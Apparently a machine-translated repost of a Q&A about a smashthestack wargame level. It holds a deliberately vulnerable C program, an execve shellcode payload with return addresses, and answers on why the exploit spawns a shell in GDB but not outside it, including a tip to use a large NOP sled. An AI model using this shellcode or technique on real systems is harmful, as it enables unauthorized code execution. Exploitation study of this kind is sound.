程序在GDB中的行为是否不同?
[英]Program behaves different in GDB?
问题描述
I have this code from smashthestack : 
我有来自smashthestack的这段代码:
//bla, based on work by nnp
#include <stdio.h>
#include <string.h>
void prompt_name(char *name, char *msg){
char buf[4096];
int i = 0;
puts(msg);
i = read(0, buf, sizeof buf);
printf("Read %d bytes\n", i);
*strchr(buf, '\n') = 0;
strncpy(name, buf, 20);
}
void prompt_full_name(char *fullname) {
char last[20];
char first[20];
prompt_name(first, "Please enter your first name: ");
prompt_name(last, "Please enter your last name: ");
strcpy(fullname, first);
strcat(fullname, " ");
strcat(fullname, last);
}
int main(int argc, char **argv){
char fullname[42];
prompt_full_name(fullname);
printf("Welcome, %s\n", fullname);
return 0;
}
I execute this program using this shellcode : 我使用以下shellcode执行该程序:
python -c 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" + "\x90" * 2009 + "\x90" * 2065 + "\n" + "\x80\xec\x02\xf4\xff\xbf\x03\xf4\xff\xbf\x04\xd4\xff\xbf\xa6\xfc\xff\xbf\xff" + "\n"' > /tmp/in
In GDB run < /tmp/in , it's working all right: (gdb) run < /tmp/wliao_in 在GDB中run < /tmp/in ,它可以正常工作:(gdb)运行</ tmp / wliao_in
Starting program: /levels/level06 < /tmp/wliao_in
Please enter your first name:
Please enter your last name:
Welcome, j
X�Rh//shh/bin��1�̀��������������� ����������������
Executing new program: /bin/bash
But in reality, it's not: 但实际上,它不是:
level6@io:/levels$ cat /tmp/in | ./level06
Please enter your first name:
Please enter your last name:
Welcome, j
X�Rh//shh/bin��1�̀��������������� ����������������
Illegal instruction
I don't understand what's different between the two? 我不明白两者之间的区别是什么?
2 个解决方案
解决方案1
1 2013-04-08 13:31:32
There are a lot of issues when running something in and out of GDB. 在GDB内外执行某些操作时存在很多问题。
First off, the environment changes, as shown in this diff. 首先,环境会发生变化,如本差异所示。 Adding and removing environment variables changes the addresses of everything above them on the stack. 添加和删除环境变量会更改堆栈上它们上方所有内容的地址。
< _=./envp2
---
> COLUMNS=91
8a9
> LINES=39
20a22
> _=/usr/bin/gdb
Secondly, the execve path affects stack layout (you're using "./level06", but GDB uses the absolute path, "/levels/level06"). 其次,execve路径会影响堆栈布局(您使用的是“ ./level06”,但是GDB使用的是绝对路径“ / levels / level06”)。 This probably appears both in argv[1] and at the bottom of the stack (I don't know why, but Linux does that). 这可能同时出现在argv [1]和堆栈的底部(我不知道为什么,但是Linux做到了)。
It's been a really long time since I did that level, but I'd try putting the shellcode in a command line argument (so there's no size restriction), with a massive NOP sled (so the stack address changes don't make a difference to whether your exploit works or not). 自从执行该级别以来已经过去了很长时间,但是我尝试将shellcode放入带有大量NOP底座的命令行参数中(因此没有大小限制)(因此,堆栈地址的更改不会产生任何影响)确定您的漏洞利用是否有效)。
解决方案2
0 2013-04-08 13:20:20
prompt_name does not produce a name terminated by a \\0 character if the name is longer than 20. The difference when run in gdb is that in gdb memory and stack management may be different in which case both strings may by accident be terminated by a \\0 . prompt_name不会产生name由一个终止\\0如果名称是大于20字符长时在gdb运行不同的是,在gdb存储器和堆栈管理可以是不同的在这种情况下这两个串可以由事故由终止\\0 。
With names smaller than 20 characters it works fine with me. 名称少于20个字符,对我来说效果很好。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.